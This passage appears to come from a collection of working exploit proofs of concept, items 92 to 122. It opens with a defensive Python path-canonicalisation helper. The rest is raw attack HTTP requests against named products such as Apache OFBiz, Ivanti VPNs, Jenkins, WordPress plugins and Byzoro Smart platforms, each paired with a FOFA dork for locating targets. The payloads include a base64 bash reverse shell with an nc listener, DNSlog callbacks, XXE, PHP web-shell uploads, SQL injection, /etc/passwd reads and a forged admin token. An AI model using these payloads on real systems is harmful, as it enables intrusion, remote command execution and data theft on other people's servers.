User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


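Items 63, 80, 85, 87 and 91 all pass a request value into a file path without canonicalising it first, and items 68, 69, 89 and 91 all reach a protected URL by spelling its path in a way the authorisation filter does not recognise but the servlet container does. The helpers below are an added example, not code from the original post or from any of the listed products: one canonicalises a request path before it is compared with authorisation rules, the other resolves a user-supplied file name under a fixed directory and refuses anything that escapes it. Both names are hypothetical, the decode-round limit is an assumption, and the traversal samples are taken from the POCs on this page plus one constructed double-encoded variant.

```python
"""Server-side canonicalisation checks for the traversal and filter-bypass
payloads in items 63, 68, 69, 80, 85, 87, 89 and 91 above.

Added example, not code from the original post or from any listed product.
Assumes an application that (a) matches the request path against
authorisation rules and (b) opens a file below a fixed directory from a
request parameter. Helper names are hypothetical.
"""
import posixpath
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # assumption: honest clients percent-encode at most once


def fully_decode(value: str) -> str:
    """Percent-decode until stable, so %252e%252e cannot survive a single pass."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many layers of percent-encoding")


def canonical_request_path(raw_path: str) -> str:
    """Path to use for authorisation decisions, instead of the raw request-URI.

    Drops the ';...' path parameter of every segment (items 68/69 append
    ';.js', item 91 turns '..' into '..;'), decodes percent-encoding (item 89
    hides '.jsp' as '.js%70'), then collapses dot segments so the filter sees
    the same path the servlet container will dispatch.
    """
    stripped = "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))
    decoded = fully_decode(stripped)
    if "\\" in decoded or "\x00" in decoded:
        raise ValueError("illegal character in path")
    norm = posixpath.normpath(decoded)
    return norm if norm.startswith("/") else "/" + norm


def safe_join(base_dir: str, requested: str) -> str:
    """Resolve a user-supplied file name under base_dir, or raise ValueError."""
    name = fully_decode(requested)
    if not name or name.startswith("/") or "\\" in name or "\x00" in name or ";" in name:
        raise ValueError(f"rejected file name {requested!r}")
    base = posixpath.normpath(base_dir)
    target = posixpath.normpath(posixpath.join(base, name))
    # prefix test on the normalised path catches every '../' combination at once
    if not target.startswith(base + "/"):
        raise ValueError(f"{requested!r} escapes {base}")
    return target


def is_allowed(base_dir: str, requested: str) -> bool:
    """True when safe_join accepts the name; the decision a download handler needs."""
    try:
        safe_join(base_dir, requested)
    except ValueError:
        return False
    return True


# Traversal values taken from the POCs above, plus one constructed variant.
TRAVERSAL_SAMPLES = [
    "..%2Fconfig.ini",                     # item 63
    "../xykqmfxpoas.jsp",                  # item 80
    "../../../tomcat/webapps",             # item 85
    "/../../../jfhatuwe.php",              # item 87
    "../../../../../../../etc/passwd",     # item 91
    "%252e%252e/config.ini",               # double-encoded variant (constructed)
]

if __name__ == "__main__":
    base = "/opt/app/userfiles"
    for sample in TRAVERSAL_SAMPLES + ["reports/q1.pdf"]:
        print(f"{sample!r:40} allowed={is_allowed(base, sample)}")
    for path in ("/center/api/task/..;/orgManage/v1/orgs/download",
                 "/sysform/003/editflow_manager.js%70",
                 "/defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js"):
        print(f"{path} -> {canonical_request_path(path)}")
```

The two checks answer different questions and both are needed: canonical_request_path stops a filter from being told a different story than the container (the "..;/" and ";.js" tricks), while safe_join stops the file-handling code from trusting a name even after authorisation has passed.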
92. Hikvision operations management center session command execution
Fastjson deserialization command execution; the payload is omitted for length.
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD


93. Qi-Anxin (奇安信) Wangshen SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--


Then fetch the uploaded file:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache-OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML document contents; the XML document is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. Goanywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. wordpress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account and password are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


File path: /upload/2.php

121. Byzoro (北京百绰智能) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. Byzoro (北京百绰智能) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
